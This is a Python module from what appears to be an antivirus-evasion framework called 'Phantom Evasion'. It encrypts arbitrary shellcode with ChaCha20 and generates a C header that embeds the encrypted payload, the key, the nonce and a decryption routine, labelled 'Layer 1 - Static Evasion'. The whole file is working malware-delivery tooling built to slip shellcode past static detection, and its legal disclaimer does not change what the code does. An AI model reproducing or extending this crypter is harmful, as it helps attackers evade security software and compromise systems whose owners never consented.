"""
Phantom Evasion - ChaCha20 Encryption Technique

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import os
from typing import Dict, Any

from Crypto.Cipher import ChaCha20


def generate_chacha20_encryption(shellcode: bytes) -> Dict[str, Any]:
    """ChaCha20-encrypt *shellcode* with a random key and nonce.

    Generates a portable C decryption stub (self-contained ChaCha20 implementation
    that does not depend on external libraries).

    Returns a dict with keys: ``code``, ``encrypted_shellcode``, ``key``,
    ``nonce``, ``description``, ``layer``, ``name``.
    """
    key = os.urandom(32)    # 256-bit key
    nonce = os.urandom(12)  # 96-bit nonce (ChaCha20-IETF)

    cipher = ChaCha20.new(key=key, nonce=nonce)
    encrypted = cipher.encrypt(shellcode)

    sc_array = ", ".join(f"0x{b:02x}" for b in encrypted)
    key_array = ", ".join(f"0x{b:02x}" for b in key)
    nonce_array = ", ".join(f"0x{b:02x}" for b in nonce)

    code = f"""\
#ifndef __PHANTOM_CHACHA20_ENCRYPT__
#define __PHANTOM_CHACHA20_ENCRYPT__
// ChaCha20 Decryption Stub – generated by Phantom Evasion
// Layer 1 – Static Evasion
// Self-contained ChaCha20 implementation (no external dependencies)
#include <stdint.h>
#include <string.h>

static unsigned char cc20_key[]   = {{{key_array}}};
static unsigned char cc20_nonce[] = {{{nonce_array}}};
static unsigned char cc20_encrypted_shellcode[] = {{{sc_array}}};
static size_t cc20_shellcode_len  = {len(encrypted)};

#define ROTL32(v, n) (((v) << (n)) | ((v) >> (32 - (n))))

static void chacha20_quarter_round(uint32_t *a, uint32_t *b, uint32_t *c, uint32_t *d) {{
    *a += *b; *d ^= *a; *d = ROTL32(*d, 16);
    *c += *d; *b ^= *c; *b = ROTL32(*b, 12);
    *a += *b; *d ^= *a; *d = ROTL32(*d,  8);
    *c += *d; *b ^= *c; *b = ROTL32(*b,  7);
}}

static void chacha20_block(uint32_t *state, uint8_t *keystream) {{
    uint32_t ws[16];
    memcpy(ws, state, 64);
    for (int i = 0; i < 10; i++) {{
        chacha20_quarter_round(&ws[0], &ws[4], &ws[ 8], &ws[12]);
        chacha20_quarter_round(&ws[1], &ws[5], &ws[ 9], &ws[13]);
        chacha20_quarter_round(&ws[2], &ws[6], &ws[10], &ws[14]);
        chacha20_quarter_round(&ws[3], &ws[7], &ws[11], &ws[15]);
        chacha20_quarter_round(&ws[0], &ws[5], &ws[10], &ws[15]);
        chacha20_quarter_round(&ws[1], &ws[6], &ws[11], &ws[12]);
        chacha20_quarter_round(&ws[2], &ws[7], &ws[ 8], &ws[13]);
        chacha20_quarter_round(&ws[3], &ws[4], &ws[ 9], &ws[14]);
    }}
    for (int i = 0; i < 16; i++) {{
        uint32_t v = ws[i] + state[i];
        keystream[i*4+0] = (uint8_t)(v);
        keystream[i*4+1] = (uint8_t)(v >>  8);
        keystream[i*4+2] = (uint8_t)(v >> 16);
        keystream[i*4+3] = (uint8_t)(v >> 24);
    }}
    state[12]++;  // counter
}}

static void chacha20_decrypt(unsigned char *key, unsigned char *nonce,
                              unsigned char *data, size_t data_len) {{
    uint32_t state[16] = {{
        0x61707865, 0x3320646e, 0x79622d32, 0x6b206574,
        // key (8 words)
        ((uint32_t*)key)[0], ((uint32_t*)key)[1],
        ((uint32_t*)key)[2], ((uint32_t*)key)[3],
        ((uint32_t*)key)[4], ((uint32_t*)key)[5],
        ((uint32_t*)key)[6], ((uint32_t*)key)[7],
        // counter
        0,
        // nonce (3 words)
        ((uint32_t*)nonce)[0], ((uint32_t*)nonce)[1], ((uint32_t*)nonce)[2]
    }};

    uint8_t keystream[64];
    size_t offset = 0;
    while (offset < data_len) {{
        chacha20_block(state, keystream);
        size_t chunk = data_len - offset;
        if (chunk > 64) chunk = 64;
        for (size_t i = 0; i < chunk; i++) data[offset + i] ^= keystream[i];
        offset += chunk;
    }}
}}

// Usage: chacha20_decrypt(cc20_key, cc20_nonce, cc20_encrypted_shellcode, cc20_shellcode_len);
#endif /* __PHANTOM_CHACHA20_ENCRYPT__ */
"""

    return {
        "code": code,
        "encrypted_shellcode": encrypted,
        "key": key,
        "nonce": nonce,
        "description": "ChaCha20-IETF encryption with embedded C decryption stub",
        "layer": "Layer 1 - Static Evasion",
        "name": "chacha20_encrypt",
    }
